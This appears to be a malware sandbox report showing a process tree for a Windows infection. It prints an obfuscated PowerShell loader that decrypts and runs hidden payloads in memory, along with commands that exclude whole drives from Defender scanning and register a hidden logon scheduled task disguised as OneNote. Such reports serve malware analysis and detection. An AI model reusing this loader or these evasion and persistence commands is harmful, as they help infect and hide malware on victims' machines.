C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('97S5HKOOEHVTK1tx3yu5lTndq7VoLhaiBMi1fQ7XC/w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BY/5WS5SKbagLrml3T2b0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ERsLU=New-Object System.IO.MemoryStream(,$param_var); $BcZuZ=New-Object System.IO.MemoryStream; $aYIjw=New-Object System.IO.Compression.GZipStream($ERsLU, [IO.Compression.CompressionMode]::Decompress); $aYIjw.CopyTo($BcZuZ); $aYIjw.Dispose(); $ERsLU.Dispose(); $BcZuZ.Dispose(); $BcZuZ.ToArray();}function execute_function($param_var,$param2_var){ $WzoGX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uXAck=$WzoGX.EntryPoint; $uXAck.Invoke($null, $param2_var);}$FVRVU = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $FVRVU;$gLqRi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FVRVU).Split([Environment]::NewLine);foreach ($pQPCS in $gLqRi) { if ($pQPCS.StartsWith('VPEeCHQfOWHyYXzmlFZZ')) { $YmBxU=$pQPCS.Substring(20); break; }}$payloads_var=[string[]]$YmBxU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "7⤵PID:2628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4588
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q4⤵PID:4008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL')4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2588
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:4024
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:5052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:996
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:1000
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2412
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:3164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:2828
Network
MITRE ATT&CK Enterprise v15
Downloads